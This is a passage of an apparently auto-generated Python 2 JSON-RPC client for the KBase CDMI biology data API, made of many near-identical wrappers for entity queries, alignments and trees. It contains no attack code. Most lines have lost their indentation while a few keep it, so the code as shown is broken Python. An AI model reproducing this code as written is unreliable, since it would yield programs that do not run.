raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
        if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
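            # unlike the other methods, this one returns the whole
            # 'result' list rather than result[0], presumably because the
            # underlying service method returns more than one value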
return resp['result']
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def align_sequences(self, seq_set, align_seq_parms):
arg_hash = {'method': 'CDMI_API.align_sequences',
'params': [seq_set, align_seq_parms],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
        if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def build_tree(self, alignment, build_tree_parms):
arg_hash = {'method': 'CDMI_API.build_tree',
'params': [alignment, build_tree_parms],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def alignment_by_id(self, aln_id):
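        """Retrieve a stored alignment by its id (CDMI_API.alignment_by_id)."""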
arg_hash = {'method': 'CDMI_API.alignment_by_id',
'params': [aln_id],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def tree_by_id(self, tree_id):
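        """Retrieve a stored tree by its id (CDMI_API.tree_by_id)."""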
arg_hash = {'method': 'CDMI_API.tree_by_id',
'params': [tree_id],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def all_entities(self):
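        """Presumably lists the entity type names defined in the CDM schema."""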
arg_hash = {'method': 'CDMI_API.all_entities',
'params': [],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def all_relationships(self):
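        """Presumably lists the relationship type names defined in the CDM schema."""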
arg_hash = {'method': 'CDMI_API.all_relationships',
'params': [],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_entity(self, entity_names):
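        """Presumably returns schema descriptions for the named entity types."""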
arg_hash = {'method': 'CDMI_API.get_entity',
'params': [entity_names],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship(self, relationship_names):
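        """Presumably returns schema descriptions for the named relationship types."""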
arg_hash = {'method': 'CDMI_API.get_relationship',
'params': [relationship_names],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
class CDMI_EntityAPI(object):
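    """Client for the CDMI entity API (JSON-RPC 1.1 over HTTP).

    Authorization is resolved in this order: an explicit token, a
    user_id/password pair, the KB_AUTH_TOKEN environment variable,
    then (unless ignore_authrc is set) the ini/rc auth files.

    A minimal usage sketch (the field name below is illustrative and
    not guaranteed to exist on the server):

        cdmi = CDMI_EntityAPI()
        contigs = cdmi.all_entities_Contig(0, 10, ['id'])
    """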
def __init__(self, url=None, timeout=30 * 60, user_id=None,
password=None, token=None, ignore_authrc=False):
if url is None:
url = 'http://kbase.us/services/cdmi_api'
scheme, _, _, _, _, _ = urlparse.urlparse(url)
if scheme not in _URL_SCHEME:
raise ValueError(url + " isn't a valid http url")
self.url = url
self.timeout = int(timeout)
self._headers = dict()
# token overrides user_id and password
if token is not None:
self._headers['AUTHORIZATION'] = token
elif user_id is not None and password is not None:
self._headers['AUTHORIZATION'] = _get_token(user_id, password)
elif 'KB_AUTH_TOKEN' in os.environ:
self._headers['AUTHORIZATION'] = os.environ.get('KB_AUTH_TOKEN')
elif not ignore_authrc:
authdata = _read_inifile()
if authdata is None:
authdata = _read_rcfile()
if authdata is not None:
if authdata.get('token') is not None:
self._headers['AUTHORIZATION'] = authdata['token']
elif(authdata.get('user_id') is not None
and authdata.get('password') is not None):
self._headers['AUTHORIZATION'] = _get_token(
authdata['user_id'], authdata['password'])
if self.timeout < 1:
raise ValueError('Timeout value must be at least 1 second')
def get_all(self, object_names, filter_clause, parameters, fields, count):
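        """Call CDMI_EntityAPI.get_all, the generic query entry point.

        Presumably runs a filtered query over the named CDM objects and
        returns at most count rows of the requested fields; the
        filter_clause/parameters pair reads like a parameterized
        SQL-style WHERE clause, but that is an inference from the
        signature, not documented behavior.
        """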
arg_hash = {'method': 'CDMI_EntityAPI.get_all',
'params': [object_names, filter_clause, parameters, fields, count],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_entity_Alignment(self, ids, fields):
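        """Fetch Alignment entities by id.

        Every CDM entity type below exposes the same method triple:
        get_entity_X(ids, fields), query_entity_X(qry, fields) and
        all_entities_X(start, count, fields); only the server method
        name in arg_hash changes between them.
        """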
arg_hash = {'method': 'CDMI_EntityAPI.get_entity_Alignment',
'params': [ids, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def query_entity_Alignment(self, qry, fields):
arg_hash = {'method': 'CDMI_EntityAPI.query_entity_Alignment',
'params': [qry, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def all_entities_Alignment(self, start, count, fields):
arg_hash = {'method': 'CDMI_EntityAPI.all_entities_Alignment',
'params': [start, count, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_entity_AlignmentAttribute(self, ids, fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_entity_AlignmentAttribute',
'params': [ids, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def query_entity_AlignmentAttribute(self, qry, fields):
arg_hash = {'method': 'CDMI_EntityAPI.query_entity_AlignmentAttribute',
'params': [qry, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def all_entities_AlignmentAttribute(self, start, count, fields):
arg_hash = {'method': 'CDMI_EntityAPI.all_entities_AlignmentAttribute',
'params': [start, count, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_entity_AlignmentRow(self, ids, fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_entity_AlignmentRow',
'params': [ids, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def query_entity_AlignmentRow(self, qry, fields):
arg_hash = {'method': 'CDMI_EntityAPI.query_entity_AlignmentRow',
'params': [qry, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def all_entities_AlignmentRow(self, start, count, fields):
arg_hash = {'method': 'CDMI_EntityAPI.all_entities_AlignmentRow',
'params': [start, count, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_entity_AlleleFrequency(self, ids, fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_entity_AlleleFrequency',
'params': [ids, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def query_entity_AlleleFrequency(self, qry, fields):
arg_hash = {'method': 'CDMI_EntityAPI.query_entity_AlleleFrequency',
'params': [qry, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def all_entities_AlleleFrequency(self, start, count, fields):
arg_hash = {'method': 'CDMI_EntityAPI.all_entities_AlleleFrequency',
'params': [start, count, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_entity_Annotation(self, ids, fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_entity_Annotation',
'params': [ids, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def query_entity_Annotation(self, qry, fields):
arg_hash = {'method': 'CDMI_EntityAPI.query_entity_Annotation',
'params': [qry, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def all_entities_Annotation(self, start, count, fields):
arg_hash = {'method': 'CDMI_EntityAPI.all_entities_Annotation',
'params': [start, count, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_entity_Assay(self, ids, fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_entity_Assay',
'params': [ids, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def query_entity_Assay(self, qry, fields):
arg_hash = {'method': 'CDMI_EntityAPI.query_entity_Assay',
'params': [qry, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def all_entities_Assay(self, start, count, fields):
arg_hash = {'method': 'CDMI_EntityAPI.all_entities_Assay',
'params': [start, count, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_entity_Association(self, ids, fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_entity_Association',
'params': [ids, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def query_entity_Association(self, qry, fields):
arg_hash = {'method': 'CDMI_EntityAPI.query_entity_Association',
'params': [qry, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def all_entities_Association(self, start, count, fields):
arg_hash = {'method': 'CDMI_EntityAPI.all_entities_Association',
'params': [start, count, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_entity_AssociationDataset(self, ids, fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_entity_AssociationDataset',
'params': [ids, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def query_entity_AssociationDataset(self, qry, fields):
arg_hash = {'method': 'CDMI_EntityAPI.query_entity_AssociationDataset',
'params': [qry, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def all_entities_AssociationDataset(self, start, count, fields):
arg_hash = {'method': 'CDMI_EntityAPI.all_entities_AssociationDataset',
'params': [start, count, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
